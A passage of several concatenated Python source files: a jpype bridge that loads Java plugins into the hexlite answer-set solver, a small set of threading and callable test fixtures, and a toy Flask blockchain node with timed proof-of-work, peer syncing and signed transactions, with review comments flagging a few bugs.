jpype.startJVM(*java_args, convertStrings=False)
def logJavaExceptionWithStacktrace(ex):
    """Log a Java exception and its full Java stack trace via logging.error."""
    logging.error("Java exception: %s", ex.toString())
    st = ex.getStackTrace()
    for ste in st:
        logging.error("\t at %s", ste.toString())
    #sb.append(ex.getClass().getName() + ": " + ex.getMessage() + "\n");
# this loads the hexlite-API-specific classes (from hexlite-java-plugin-api-XYZ.jar)
# These are jpype class proxies used throughout the bridge below.
IPluginAtom = JClass("at.ac.tuwien.kr.hexlite.api.IPluginAtom")
ISolverContext = JClass("at.ac.tuwien.kr.hexlite.api.ISolverContext")
JStoreAtomException = JClass("at.ac.tuwien.kr.hexlite.api.ISolverContext.StoreAtomException")
IInterpretation = JClass("at.ac.tuwien.kr.hexlite.api.IInterpretation")
ISymbol = JClass("at.ac.tuwien.kr.hexlite.api.ISymbol")
class JavaPluginHolder:
    """Pairs a loaded Java plugin instance with the class name it came from."""
    def __init__(self, classname, jplugin):
        self.classname = classname
        self.jplugin = jplugin
# Java plugins instantiated by register(); kept alive for the whole session.
loadedPlugins = []
def convertExtSourceProperties(jesp):
    """Copy the hexlite-supported fields of a Java ExtSourceProperties
    object into a Python dlvhex.ExtSourceProperties."""
    # convert only those parts that are implemented in hexlite
    ret = dlvhex.ExtSourceProperties()
    ret.setProvidesPartialAnswer(jesp.getProvidesPartialAnswer())
    ret.setDoInputOutputLearning(jesp.getDoInputOutputLearning())
    return ret
def convertInputArguments(jinputarguments):
    """Map Java IPluginAtom.InputType values to dlvhex input type constants.

    Returns a tuple with one entry per declared input argument; raises
    ValueError for an unknown type.
    """
    def convertOne(t):
        if t == IPluginAtom.InputType.PREDICATE:
            return dlvhex.PREDICATE
        elif t == IPluginAtom.InputType.CONSTANT:
            return dlvhex.CONSTANT
        elif t == IPluginAtom.InputType.TUPLE:
            return dlvhex.TUPLE
        else:
            raise ValueError("unknown input argument type "+repr(t))
    ret = tuple([ convertOne(t) for t in jinputarguments ])
    #logging.debug("XXX converted jinputarguments %s to %s", jinputarguments, ret)
    return ret
@jpype.JImplements(ISymbol)
class JavaSymbolImpl:
    """ISymbol implementation wrapping a single hexlite ID.

    Delegates all term/atom accessors to the wrapped hexlite ID and caches
    its string value for hashing.
    """
    # a JavaSymbolImpl mainly holds a hid (hexlite.ID)
    # (concretely at the moment it always holds a hexlite.clingobackend.ClingoID)
    def __init__(self, hid=None):
        assert(isinstance(hid,ID))
        self.hid = hid
        self.__valuecache = hid.value()
        #logging.info("JavaSymbolImpl with hid %s %s", self.hid, self.__valuecache)
    @jpype.JOverride
    def negate(self):
        """Return a new symbol wrapping the negated ID."""
        #logging.info("want to negate %s", self.hid)
        return JavaSymbolImpl(self.hid.negate())
    @jpype.JOverride
    def value(self):
        #logging.info("value of %s", self.hid)
        return self.hid.value()
    @jpype.JOverride
    def intValue(self):
        #logging.info("intvalue of %s", self.hid)
        return self.hid.intValue()
    @jpype.JOverride
    def isTrue(self):
        #logging.info("isTrue of %s", self.hid)
        return self.hid.isTrue()
    @jpype.JOverride
    def isFalse(self):
        #logging.info("isFalse of %s", self.hid)
        return self.hid.isFalse()
    @jpype.JOverride
    def isAssigned(self):
        #logging.info("isAssigned of %s", self.hid)
        return self.hid.isAssigned()
    @jpype.JOverride
    def tuple(self):
        """Return the term tuple as a java ArrayList of wrapped symbols."""
        ret = java.util.ArrayList()
        #logging.info("want to get tuple of %s", self.hid)
        for e in self.hid.tuple():
            ret.add(JavaSymbolImpl(e))
        return ret
    @jpype.JOverride
    def extension(self):
        """Return the predicate extension as a java HashSet of ArrayLists of symbols."""
        #logging.info("creating hashset")
        ret = java.util.HashSet()
        #logging.info("filling hashset")
        for e in self.hid.extension():
            #logging.info("adding tuple %s from extension", e)
            #ret.add(e)
            tup = java.util.ArrayList()
            for t in e:
                #jsym = jpype.JObject(JavaSymbolImpl(t))
                jsym = JavaSymbolImpl(t)
                #logging.info("adding symbol %s %s as %s", t, t.__class__, repr(jsym))
                tup.add(jsym)
            #logging.info("adding tuple %s to result as %s", tup, repr(tup))
            ret.add(tup)
        #logging.info("returning %s %s", ret, ret.__class__)
        return ret
    @jpype.JOverride
    def hashCode(self):
        # Java needs a non-negative 32-bit int; mask Python's hash accordingly.
        #logging.info("returning hash code for %s", self)
        return int(hash(self.__valuecache) & 0x7FFFFFFF)
    def __eq__(self, other):
        #logging.info("__eq__ got called on %s vs repr(%s)", self.hid, repr(other))
        if not isinstance(other, JavaSymbolImpl):
            return False
        return self.hid == other.hid
    @jpype.JOverride
    def equals(self, other):
        # we could just write self == other, but let's make it explicit that we call above method
        # reminder:
        # in Java, == only compares memory locations, and content comparison is done with equals()
        # in Python, == is the same as __eq__ and it may do whatever it wants
        return self.__eq__(other)
    def __str__(self):
        #logging.info("__str__ of %s %s", self.hid, self.__valuecache)
        return str(self.hid)
    @jpype.JOverride
    def toString(self):
        #logging.info("toString of %s %s", self.hid, self.__valuecache)
        return str(self.hid)
@jpype.JImplements(IInterpretation)
class JavaInterpretationImpl:
    """IInterpretation view over the current dlvhex input interpretation."""
    def __init__(self):
        pass
    @jpype.JOverride
    def getTrueInputAtoms(self):
        return self._adapt(dlvhex.getTrueInputAtoms())
    @jpype.JOverride
    def getInputAtoms(self):
        return self._adapt(dlvhex.getInputAtoms())
    def _adapt(self, items):
        """Wrap each hexlite atom as a Java ISymbol inside a java HashSet."""
        ret = java.util.HashSet()
        # each atom from dlvhex.getInputAtoms() is converted
        # from hexlite to a java ISymbol
        for x in items:
            #logging.warning("adapting %s", x)
            ret.add(JObject(JavaSymbolImpl(x)))
        return ret
@jpype.JImplements(IPluginAtom.IQuery)
class JavaQueryImpl:
    """IQuery handed to Java plugin atoms: input tuple + interpretation."""
    def __init__(self, arguments):
        self.jinputTuple = jpype.JClass("java.util.ArrayList")()
        # each argument is converted from hexlite to a java ISymbol
        # each argument is an ID or a tuple
        # we follow the structure of the argument
        for arg in arguments:
            #logging.debug("argument is %s", repr(arg))
            # Arguments are expected pre-wrapped (see convertArguments).
            assert(isinstance(arg, (JavaSymbolImpl,ISymbol)))
            self.jinputTuple.add(arg)
    @jpype.JOverride
    def getInterpretation(self):
        return JavaInterpretationImpl()
    @jpype.JOverride
    def getInput(self):
        return self.jinputTuple
# Terms matching this look like plain (unquoted) constants; anything else
# must go through storeString (see storeConstant below).
# NOTE(review): the `+` after the first character class requires at least
# two characters, so a single-letter constant like 'a' is rejected — confirm.
rValidConstant = re.compile(r'^[a-z][a-z0-9A-Z_]+$')
@jpype.JImplements(ISolverContext)
class JavaSolverContextImpl:
    """ISolverContext implementation backed by the dlvhex Python API.

    Converts between hexlite IDs and Java ISymbol wrappers for storing
    atoms/terms and for nogood learning.
    """
    def __init__(self):
        pass
    @jpype.JOverride
    def storeOutputAtom(self, otuple):
        """Store an output atom; otuple elements are ISymbol wrappers."""
        try:
            s = dlvhex.storeOutputAtom([ x.hid for x in otuple ])
        except dlvhex.StoreAtomException as e:
            # Re-raise as the Java-visible exception type.
            raise JStoreAtomException(str(e))
        r = JavaSymbolImpl(s)
        ret = jpype.JObject(r, ISymbol)
        return ret
    @jpype.JOverride
    def getInstantiatedOutputAtoms(self):
        """Return all instantiated output atoms as a java ArrayList of ISymbol."""
        ret = java.util.ArrayList()
        for oa in dlvhex.getInstantiatedOutputAtoms():
            ret.add(jpype.JObject(JavaSymbolImpl(oa), ISymbol))
        return ret
    @jpype.JOverride
    def storeAtom(self, tuple_):
        """Store an atom; tuple_ elements are ISymbol wrappers."""
        try:
            s = dlvhex.storeAtom([ x.hid for x in tuple_ ])
        except dlvhex.StoreAtomException as e:
            raise JStoreAtomException(str(e))
        r = JavaSymbolImpl(s)
        ret = jpype.JObject(r, ISymbol)
        return ret
    @jpype.JOverride
    def storeConstant(self, s):
        """Store a plain (unquoted) constant term; rejects string-like terms."""
        # convert to python string, otherwise various string operations done within hexlite will fail on the java strings
        pythonstr = str(s)
        # NOTE(review): the term is only rejected when BOTH quote checks and
        # the regex fail; a half-quoted term slips through — confirm whether
        # `or` was intended between the quote checks.
        if len(pythonstr) == 0 or (pythonstr[0] != '"' and pythonstr[-1] != '"' and not rValidConstant.match(pythonstr)):
            raise ValueError("cannot storeConstant for term '{}' with is probably a string (use storeString)".format(pythonstr))
        r = jpype.JObject(JavaSymbolImpl(dlvhex.storeConstant(pythonstr)), ISymbol)
        return r
    @jpype.JOverride
    def storeString(self, s):
        """Store a quoted string term."""
        pythonstr = str(s)
        r = jpype.JObject(JavaSymbolImpl(dlvhex.storeString(pythonstr)), ISymbol)
        return r
    @jpype.JOverride
    def storeInteger(self, i):
        """Store an integer term."""
        # BUG FIX: the original passed the undefined name `s` instead of the
        # parameter `i` (guaranteed NameError at runtime); also wrap the
        # result in a JObject like the other store* methods for consistency.
        return jpype.JObject(JavaSymbolImpl(dlvhex.storeInteger(i)), ISymbol)
    @jpype.JOverride
    def learn(self, nogood):
        """Forward a nogood (collection of ISymbol) to the dlvhex learner."""
        logging.info("java learns nogood %s", nogood.toString())
        dlvhex.learn([ x.hid for x in nogood ])
def convertArguments(pyArguments):
    """Convert hexlite IDs into JavaSymbolImpl wrappers for a Java query.

    All arguments except the last must be IDs; the last may be a tuple
    (a variable-length argument list), which is unfolded into the result
    so Java never receives a Python tuple.
    """
    # all ID classes stay the same way
    # all tuples become unfolded (only at the end of the list)
    # this is necessary because we do not want Java to get either Tuple or ISymbol as arguments
    if len(pyArguments) == 0:
        return []
    assert(all([ isinstance(a, ID) for a in pyArguments[:-1] ]))
    assert(isinstance(pyArguments[-1], (ID, tuple)))
    ret = [ JavaSymbolImpl(a) for a in pyArguments[:-1] ]
    if isinstance(pyArguments[-1], ID):
        # convert last element as one
        ret.append( JavaSymbolImpl(pyArguments[-1]) )
    else:
        # extend list from converted list of parts of last element (variable length argument list)
        ret.extend([ JavaSymbolImpl(a) for a in pyArguments[-1] ])
    return ret
class JavaPluginCallWrapper:
    """Python-callable adapter dispatching an external atom call to Java.

    Instances are installed into globals() under the external atom name by
    register(); hexlite then invokes them like ordinary plugin functions.
    """
    def __init__(self, eatomname, pluginholder, pluginatom):
        self.eatomname = eatomname
        self.pluginholder = pluginholder
        self.pluginatom = pluginatom
    def __call__(self, *arguments):
        """Run the Java atom's retrieve() and feed its true tuples to dlvhex.output."""
        try:
            logging.debug("executing java __call__ for %s with %d arguments", self.eatomname, len(arguments))
            jsc = JavaSolverContextImpl()
            jq = JavaQueryImpl(convertArguments(arguments))
            #logging.info("executing retrieve")
            janswer = self.pluginatom.retrieve(jsc, jq)
            #logging.debug("retrieved")
            tt = janswer.getTrueTuples()
            #logging.info("true tuples")
            if __debug__:
                # sort for reproducable runs (java hashing is not stable across runs)
                tt = sorted(tt, key=lambda t: t.toString())
            for t in tt:
                logging.debug("true tuple = %s %s", repr(t), t.toString())
                for idx, elem in enumerate(t):
                    logging.debug(" idx %d = %s %s", idx, repr(elem), elem.toString())
                assert(all([ isinstance(e, JavaSymbolImpl) for e in t ]))
                tupleOfID = tuple([ e.hid for e in t ])
                #logging.warning("retrieve created output %s for java output %s", tupleOfID, t.toString())
                dlvhex.output(tupleOfID)
        except jpype.JException as e:
            # Java-side failures: log with the Java stack trace, then re-raise.
            logging.error("plugin call wrapper got Java exception %s %s", e, e.__class__)
            logJavaExceptionWithStacktrace(e)
            raise
        except Exception as e:
            logging.error("plugin call wrapper got exception that is not a JException %s %s", e, e.__class__)
            raise
def register(arguments):
    """Load the given Java plugin classes and register their external atoms.

    For each class name: instantiate the plugin, wrap it in a
    JavaPluginHolder, and for every atom it creates install a
    JavaPluginCallWrapper under the atom's predicate name in globals()
    (hexlite looks external atoms up by name in this module's globals).
    """
    logging.info("Java API loaded with arguments %s", arguments)
    global loadedPlugins
    for classname in arguments:
        logging.info("loading Java Plugin %s", classname)
        try:
            jclass = jpype.JClass(classname)
            assert(jclass is not None)
            logging.debug("instantiating Plugin")
            jinst = jclass()
            assert(jinst is not None)
            jholder = JavaPluginHolder(classname, jinst)
            assert(jholder is not None)
            loadedPlugins.append(jholder)
            logging.info("registering atoms of plugin %s with name %s", classname, jinst.getName())
            for jpluginatom in jholder.jplugin.createAtoms():
                pred = str(jpluginatom.getPredicate())
                inputArguments = jpluginatom.getInputArguments()
                outputArguments = jpluginatom.getOutputArguments()
                jesp = jpluginatom.getExtSourceProperties()
                prop = convertExtSourceProperties(jesp)
                if pred in globals():
                    # refuse to clobber existing names (duplicate atom or builtin)
                    logging.error("trying to override '%s' in globals - duplicate external atom name or conflict with python internal names", pred)
                else:
                    globals()[pred] = JavaPluginCallWrapper(pred, jholder, jpluginatom)
                    dlvhex.addAtom(pred, convertInputArguments(inputArguments), int(outputArguments), prop)
        # NOTE(review): bare `JException` here (elsewhere `jpype.JException`) —
        # confirm it is imported at module top, otherwise this handler itself
        # raises NameError.
        except JException as e:
            logJavaExceptionWithStacktrace(e)
            raise
    logging.info("loaded %d Java plugins", len(loadedPlugins))
def teardown():
    """Tear down all loaded Java plugins and shut down the JVM.

    A daemon watchdog thread is started before jpype.shutdownJVM(): if the
    JVM fails to shut down within 10 seconds, the whole process is killed
    with os._exit(-1) so a hung JVM cannot block interpreter exit.
    """
    logging.info("teardown: destructing plugins")
    global loadedPlugins
    for p in loadedPlugins:
        try:
            logging.info("teardown on %s", p.classname)
            if jpype.isJVMStarted():
                p.jplugin.teardown()
            else:
                logging.info("no teardown - JVM not started")
        except JException as e:
            # best-effort: log and continue tearing down remaining plugins
            logJavaExceptionWithStacktrace(e)
    logging.info("teardown: JVM shutdown")
    def watchdog():
        # kills the process if shutdownJVM() below hangs
        logging.info("watchdog started")
        time.sleep(10)
        logging.error("watchdog still alive -> killing self because JVM shutdown failed")
        os._exit(-1)
    stt = threading.Thread(target=watchdog, daemon=True)
    stt.start()
    try:
        jpype.shutdownJVM()
    except jpype._core.JVMNotRunning:
        logging.warning("JVM shutdown: JVM was not running")
        pass # fine
    logging.info("JVM shutdown successful")
|
test.py |
import threading
import collections
import sys
# Python 2/3 compatibility: the stdlib queue module was renamed in Python 3.
is_py2 = sys.version[0] == '2'
if is_py2:
    import Queue as queue
else:
    import queue as queue
def isScalar(x):
    """Return True unless *x* is a list or tuple."""
    if isinstance(x, (list, tuple)):
        return False
    return True
def isList(x):
    """Return True only when *x* is a list (not a tuple or other sequence)."""
    return isinstance(x, list)
def asString(x):
    """Return the str() representation of *x*."""
    text = str(x)
    return text
def makeDict():
    """Return a small fixed str->float dict fixture."""
    return dict(a=1.0, c=3.0, b=2.0)
def makeTuple():
    """Return a fixed 3-element float tuple fixture."""
    values = (1.0, 2.0, 3.0)
    return values
def makeTupleWithOrderedDict():
    """Return a (float, OrderedDict) fixture with keys inserted as b, a."""
    od = collections.OrderedDict()
    od['b'] = 777
    od['a'] = 22
    return (1.0, od)
def makeIterator(x):
    """Return a fresh iterator over the elements of *x*."""
    iterator = iter(x)
    return iterator
def makeGenerator(n):
    """Yield the integers 0, 1, ... while they stay below *n*.

    Uses an explicit counter (not range) so non-integer bounds also work.
    """
    count = 0
    while count < n:
        yield count
        count += 1
def iterateOnThread(iter):
    """Consume *iter* on a worker thread and return the collected items.

    Joins in 0.1s slices so the calling thread stays responsive while waiting.
    """
    collected = []
    def _drain():
        collected.extend(iter)
    worker = threading.Thread(target=_drain)
    worker.start()
    while worker.is_alive():
        worker.join(0.1)
    return collected
def invokeOnThread(f, *args, **kwargs):
    """Call f(*args, **kwargs) on a worker thread and return its result.

    Joins in 0.1s slices so the calling thread stays responsive while waiting.
    """
    box = []
    def _run():
        box.append(f(*args, **kwargs))
    worker = threading.Thread(target=_run)
    worker.start()
    while worker.is_alive():
        worker.join(0.1)
    return box[0]
def reflect(x):
    """Identity function: return the argument unchanged."""
    return x
def callFunc(f, *args, **kwargs):
    """Invoke *f* with the given positional and keyword arguments."""
    result = f(*args, **kwargs)
    return result
def testThrowError():
    """Trigger throwError() so callers can exercise exception propagation."""
    throwError()
def throwError():
    """Always raise ValueError with a fixed, recognizable message."""
    message = 'A very specific bad thing happened'
    raise ValueError(message)
class PythonClass(object):
    """Fixture class with two int class attributes and a classmethod."""

    FOO = 1
    BAR = 2

    @classmethod
    def class_method(cls):
        """Return the FOO class attribute."""
        return cls.FOO
class PythonCallable(object):
    """Callable fixture object that echoes its single argument.

    FIX: the argument documentation used to sit as a bare class-level string
    AFTER the FOO/BAR assignments — in that position it is a no-op expression
    statement, not a docstring. It is now the docstring of __call__.
    """

    FOO = 1
    BAR = 2

    def __call__(self, arg1):
        """Call a callable

        Args:
            arg1: First argument.

        Returns:
            arg1 unchanged.
        """
        return arg1
def create_callable():
    """Return a fresh PythonCallable instance."""
    return PythonCallable()

# Module-level fixture: a dict exposing a callable under the 'callable' key.
dict_with_callable = dict(callable = create_callable())
|
cukonchain2.py |
# Importing the libraries
import datetime
import hashlib
import base64
import json
from flask import Flask, jsonify, request
import requests
from uuid import uuid4
from urllib.parse import urlparse
from timeit import default_timer as timer
import threading
import random
from numpy import random
from RSA_everything import to_verify_with_public_key
#import time
node_address = str(uuid4()).replace('-', '')
myNodeIp = '127.0.0.1:5002'
myNodeName = 'Frodo'
reward_address = '558fe4ed58c8cda6e048ac3766705eca80ddb846648e3c293571d7f1c08fe9dd'
firstnode = '127.0.0.1:5001'
difficulty = '000'
reward_rate = 100000
mark_length = 0
# Creating a Web App
app = Flask(__name__)
#Blockchain class
class Blockchain:
    """In-memory blockchain with a timed proof-of-work scheme.

    NOTE(review): the attributes below are CLASS attributes, and some of the
    same names also exist as module globals (mined_block_time, reward rate
    machinery) — the methods mix `self.` and bare-global access; verify which
    copy each caller really reads before refactoring.
    """
    current_hash = ''             # hash of the block currently being built
    mined_block_time = 0          # shadowed by the module global of the same name
    previous_block_reward = 0     # reward paid for the previously mined block
    blockchain_chunk_time = 0     # accumulated mining time of the current chunk
    blockhain_chunk_size = 10     # blocks per reward-rate recalculation (name typo kept: callers use it)
    block_timestamp = ''          # timestamp captured while mining
    def __init__(self):
        self.chain = []
        self.transactions = []        # transactions going into the next block
        self.transaction_queue = []   # transactions waiting for balance check
        self.create_block(proof = 1, previous_hash = '0')  # genesis block
        self.nodes = set()
    #if there is no transactions dont mine block
    def create_block(self, proof, previous_hash):
        """Append a block for the pending transactions.

        Returns the block dict, or the string 'Transaction rejected' when
        there are fewer than 2 pending transactions on a non-empty chain.
        """
        if len(self.transactions) > 1 :
            # NOTE(review): 'mined block time' reads the bare global
            # mined_block_time set by timed_proof_of_work(); calling this
            # branch before any mining raises NameError.
            block = {'index': len(self.chain) + 1,
                     'hash' : self.current_hash,
                     'timestamp': self.block_timestamp,
                     'proof': proof,
                     'previous_hash': previous_hash,
                     'transactions': self.transactions,
                     'mined block time': mined_block_time}
            self.chain.append(block)
            self.transactions = []
            return block
        if len(self.chain) == 0 :
            # genesis block: fixed hash, seeded with one funding transaction
            block = {'index': len(self.chain) + 1,
                     'hash' : 'genesis_hash',
                     'timestamp': str(datetime.datetime.now()),
                     'proof': proof,
                     'previous_hash': previous_hash,
                     'transactions': self.transactions,
                     'mined block time': 0}
            genesis_transaction = {
                "sender": 'genesis',
                "receiver": 'a55ea87bb966a9c4c0f9ab82ec096e95a8ba1878aafa3070c4de4c4d5201e3f5',
                "amount": 1000,
            }
            self.transactions.append(genesis_transaction)
            self.chain.append(block)
            self.transactions = []
            return block
        else:
            # too few transactions: drop them and refuse to build a block
            self.transactions = []
            return 'Transaction rejected'
    def get_previous_block(self):
        """Return the most recently appended block."""
        return self.chain[-1]
    #timed proof of work reward reverse proportional to the time spent on mining
    def timed_proof_of_work(self, previous_proof, previous_hash):
        """Search for a proof whose block hash matches the difficulty prefix.

        Side effects: sets self.current_hash, self.block_timestamp,
        self.previous_block_reward and the GLOBAL mined_block_time.
        NOTE(review): `global previous_block_reward` is declared but the code
        assigns self.previous_block_reward — the global is never written.
        """
        global previous_block_reward
        global mined_block_time
        global difficulty
        new_proof =1
        check_proof = False
        while check_proof is False:
            start = timer()
            self.block_timestamp = str(datetime.datetime.now())
            current_block = {'index': len(self.chain) + 1,
                             'timestamp': str(self.block_timestamp),
                             'proof': new_proof,
                             'previous_hash': previous_hash,
                             'transactions': self.transactions}
            hash_operation = self.hash(current_block)
            #DIFFICULTY
            if hash_operation[:len(difficulty)] == difficulty:
                self.current_hash = hash_operation
                check_proof = True
                end = timer()
                time_elapsed = end - start
                #calculate reward reverse proportional to time
                reward = 1/(time_elapsed * reward_rate)
                self.previous_block_reward = reward
                mined_block_time = time_elapsed
            else:
                # random (numpy) rather than sequential proof search
                new_proof = random.randint(1000)
        return new_proof
    def hash(self, block):
        """SHA-256 of the canonical (sorted-key) JSON encoding of *block*."""
        encoded_block = json.dumps(block, sort_keys = True).encode()
        return hashlib.sha256(encoded_block).hexdigest()
    def calculate_reward_rate(self):
        """Recompute the global reward_rate from the average block time."""
        global reward_rate
        self.calculate_blockchain_time()
        print('Reward rate adjusted')
        average_block_time = self.blockchain_chunk_time/len(self.chain)
        print(f'Average block time: {average_block_time}')
        reward_rate = 1/average_block_time
        print(f'Reward rate: {reward_rate}')
    def calculate_blockchain_time(self):
        """Sum mining times of the current chunk into blockchain_chunk_time."""
        for i in range(mark_length, mark_length + self.blockhain_chunk_size):
            block = self.chain[i]
            self.blockchain_chunk_time += block['mined block time']
    def is_chain_valid(self, chain):
        """Validate hash linkage and difficulty for every block after genesis."""
        previous_block = chain[0]
        block_index = 1
        while block_index < len(chain):
            block = chain[block_index]
            # re-hash only the fields that went into mining (order matters
            # for the canonical JSON hash)
            tmp_current_block = {
                'index': block['index'],
                'timestamp': block['timestamp'],
                'proof': block['proof'],
                'previous_hash': block['previous_hash'],
                'transactions': block['transactions']
            }
            if block['previous_hash'] != self.hash(previous_block) :
                return False
            hash_operation = self.hash(tmp_current_block)
            if hash_operation[:len(difficulty)] != difficulty or hash_operation != block['hash']:
                return False
            previous_block = block
            block_index += 1
        return True
    def add_transaction(self, sender, receiver, amount):
        """Append a transaction to the pending list; return next block index."""
        self.transactions.append({'sender': sender,
                                  'receiver': receiver,
                                  'amount': amount})
        previous_block = self.get_previous_block()
        return previous_block['index'] + 1
    def add_to_transaction_queue(self, sender, receiver, amount):
        """Queue a transaction for later balance check; return next block index."""
        self.transaction_queue.append({'sender': sender,
                                       'receiver': receiver,
                                       'amount': amount})
        previous_block = self.get_previous_block()
        return previous_block['index'] + 1
    def add_node(self, address):
        """Register a peer node by its host:port (netloc of *address*)."""
        parsed_url = urlparse(address)
        self.nodes.add(parsed_url.netloc)
    def replace_chain(self):
        """Longest-chain consensus: adopt the longest valid peer chain.

        Unreachable peers are dropped from self.nodes. Returns True when the
        local chain was replaced.
        """
        network = self.nodes
        network_copy = network.copy()
        longest_chain = None
        longest_node = None
        max_length = len(self.chain)
        for node in network:
            if node != myNodeIp:
                try:
                    response = requests.get(f'http://{node}/get_chain')
                    if response.status_code == 200:
                        length = response.json()['length']
                        chain = response.json()['chain']
                        if length > max_length and self.is_chain_valid(chain):
                            max_length = length
                            longest_chain = chain
                            longest_node = node
                except :
                    # peer unreachable -- prune it
                    network_copy.remove(node)
                    print(f'Node {node} disconnected')
                    print(f'New list of nodes: {network_copy}')
        network = network_copy
        if longest_chain:
            self.chain = longest_chain
            print(f'Longer chain detected on node: {longest_node}, your chain was replaced.')
            return True
        return False
    #check blockchain if there is enough funds before adding transaction
    def check_balance(self, sender):
        """Compute *sender*'s balance by replaying every on-chain transaction."""
        transactions = []
        chain = self.chain
        balance = 0
        for block in chain:
            transactions.append(block['transactions'])
        for transactionList in transactions:
            for transaction in transactionList:
                # round-trip through JSON to normalise dict-like rows
                stringTransaction = json.dumps(transaction)
                jsonTransaction = json.loads(stringTransaction)
                amount = jsonTransaction["amount"]
                receiver_chain = jsonTransaction["receiver"]
                sender_chain = jsonTransaction["sender"]
                if receiver_chain == sender:
                    balance += amount
                if sender_chain == sender:
                    balance -= amount
        return balance
###################################################################
#methods
def mine_blocks():
    """Pop one queued transaction, mine a block for it and broadcast it.

    Side effects: may recalculate the global reward rate, mutates the global
    blockchain and mark_length, and POSTs the new block to every known peer.
    """
    # Recalculate the reward rate once a full chunk of blocks has been mined
    # since the last recalculation mark.
    global mark_length
    if (len(blockchain.chain) - blockchain.blockhain_chunk_size >= mark_length ):
        blockchain.calculate_reward_rate()
        mark_length = len(blockchain.chain)
        blockchain.blockchain_chunk_time = 0
    # Pop the oldest queued transaction and re-check the sender's balance
    # (it may have changed since the transaction was queued).
    transaction = blockchain.transaction_queue.pop(0)
    sender = transaction['sender']
    send_amount = transaction['amount']
    balance = blockchain.check_balance(sender)
    new_balance = balance - send_amount
    if(new_balance) >= 0:
        blockchain.transactions.append(transaction)
    # NOTE(review): when funds are insufficient the transaction is silently
    # dropped but mining still proceeds with only the reward transaction.
    # Build the new block: reward transaction + proof of work.
    previous_block = blockchain.get_previous_block()
    previous_proof = previous_block['proof']
    previous_hash = blockchain.hash(previous_block)
    blockchain.add_transaction(sender = node_address, receiver = reward_address,
                               amount = blockchain.previous_block_reward)
    proof = blockchain.timed_proof_of_work(previous_proof, previous_hash)
    block = blockchain.create_block(proof, previous_hash)
    # BUG FIX: create_block() signals rejection with the string
    # 'Transaction rejected', but this used to compare against
    # 'No transactions in block' -- a rejection therefore fell into the
    # success branch and crashed on block['index']. Check the type instead
    # so any string result is treated as a rejection message.
    if not isinstance(block, str):
        new_block = {
            'index': block['index'],
            'hash' : block['hash'],
            'timestamp': block['timestamp'],
            'proof': block['proof'],
            'previous_hash': block['previous_hash'],
            'transactions': block['transactions'],
            'mined block time': block['mined block time']
        }
        print('New block mined!')
        print(new_block)
        # If a longer chain exists elsewhere, our freshly mined block is orphaned.
        is_chain_replaced = blockchain.replace_chain()
        if is_chain_replaced:
            new_block_index = block['index']
            print(f'Block {new_block_index} orphaned!')
        else:
            # Distribute the block to all reachable peers; prune dead ones.
            network_copy = blockchain.nodes.copy()
            print(f'Time elapsed to mine block {mined_block_time} reward : {blockchain.previous_block_reward}')
            for node in blockchain.nodes:
                try:
                    if node != myNodeIp:
                        response = requests.post(f'http://{node}/add_new_block', json = new_block)
                        if response.status_code == 201:
                            print(f'New block distributed')
                except :
                    network_copy.remove(node)
            blockchain.nodes = network_copy
    else:
        print(block)
#send my ip to first node get list of nodes connected to it and send my ip to the rest of the nodes from the list
def connect_to_network():
    """Announce this node to the bootstrap node, then to every peer it knows.

    Populates blockchain.nodes with the union of all node lists received.
    """
    my_node = {
        'nodeIp': myNodeIp,
        'nodeName': myNodeName,
    }
    blockchain.nodes.add(myNodeIp)
    if firstnode != '':
        request = requests.post(f'http://{firstnode}/add_new_node', json = my_node)
        if request.status_code == 201:
            # NOTE(review): local name `json` shadows the imported json module
            # for the rest of this function (harmless here, but fragile).
            json = request.json()
            blockchain.nodes = set(json.get('nodeList'))
            message = json.get('message')
            print(message)
            print(f' Received nodes: {blockchain.nodes}')
            if len(blockchain.nodes) > 0:
                for node in blockchain.nodes:
                    if node != myNodeIp and node != firstnode: #safe switch for double
                        request = requests.post(f'http://{node}/add_new_node', json = my_node)
                        if request.status_code == 201:
                            json = request.json()
                            #add recieved nodes from all nodes
                            newNodes = set(json.get('nodeList'))
                            blockchain.nodes = blockchain.nodes.union(newNodes)
                            message = json.get('message')
                            print(message)
                            print(f' Received nodes: {blockchain.nodes}')
def start_mining():
    """Loop forever, mining whenever the transaction queue is non-empty."""
    while True:
        if len(blockchain.transaction_queue) >= 1:
            mine_blocks()
def mining_thread():
    """Launch start_mining() on a background daemon thread."""
    worker = threading.Thread(target=start_mining, daemon=True)
    worker.start()
def download_chain():
    """Adopt the longest valid chain from the network, reporting success."""
    if blockchain.replace_chain():
        print('Blockchain is downloaded')
def encode_signature(decoded_signature):
    """Decode a base64-encoded signature string back into raw bytes."""
    raw = base64.b64decode(decoded_signature)
    return bytes(raw)
# getting the full Blockchain
@app.route('/get_chain', methods = ['GET'])
def get_chain():
    """Return the full chain and its length as JSON (HTTP 200)."""
    payload = {
        'chain': blockchain.chain,
        'length': len(blockchain.chain),
    }
    return jsonify(payload), 200
# Checking if the Blockchain is valid
@app.route('/is_valid', methods = ['GET'])
def is_valid():
    """Run full-chain validation and report the outcome (HTTP 200)."""
    if blockchain.is_chain_valid(blockchain.chain):
        response = {'message': 'All good. The Blockchain is valid.'}
    else:
        response = {'message': 'Houston, we have a problem. The Blockchain is not valid.'}
    return jsonify(response), 200
# Adding a new transaction to the Blockchain
@app.route('/add_transaction', methods = ['POST'])
def add_transaction():
    """Verify a signed transaction and queue it for mining.

    Expects JSON with sender, receiver, amount, signature (base64) and
    sender_public_key. The signature is checked over the concatenation
    sender + receiver + str(amount).
    """
    # NOTE(review): local name `json` shadows the imported json module here.
    json = request.get_json()
    transaction_keys = ['sender', 'receiver', 'amount', 'signature', 'sender_public_key']
    if not all(key in json for key in transaction_keys):
        return 'Some elements of the transaction are missing', 400
    send_amount = json.get('amount')
    sender = json.get('sender')
    receiver = json.get('receiver')
    signature = encode_signature(json.get('signature'))
    sender_public_key = str.encode(json.get('sender_public_key'))
    # the signed message is the concatenation of sender, receiver and amount
    transaction_string = sender + receiver + str(send_amount)
    if(to_verify_with_public_key(signature, transaction_string, sender_public_key)):
        balance = blockchain.check_balance(sender)
        new_balance = balance - send_amount
        if(new_balance) >= 0:
            blockchain.add_to_transaction_queue(json['sender'], json['receiver'], json['amount'])
            print("Signature valid, transaction added!")
            response = {'message': f'This transaction was added to transaction queue, position in queue: {len(blockchain.transaction_queue)}'
            }
        else:
            response = {'message': f'Not enough funds'}
        return jsonify(response), 201
    else:
        message = {'message': "Transaction was tampered with!"}
        print(message)
        # NOTE(review): a tampered transaction still returns HTTP 201; a 4xx
        # status would be more appropriate -- confirm clients before changing.
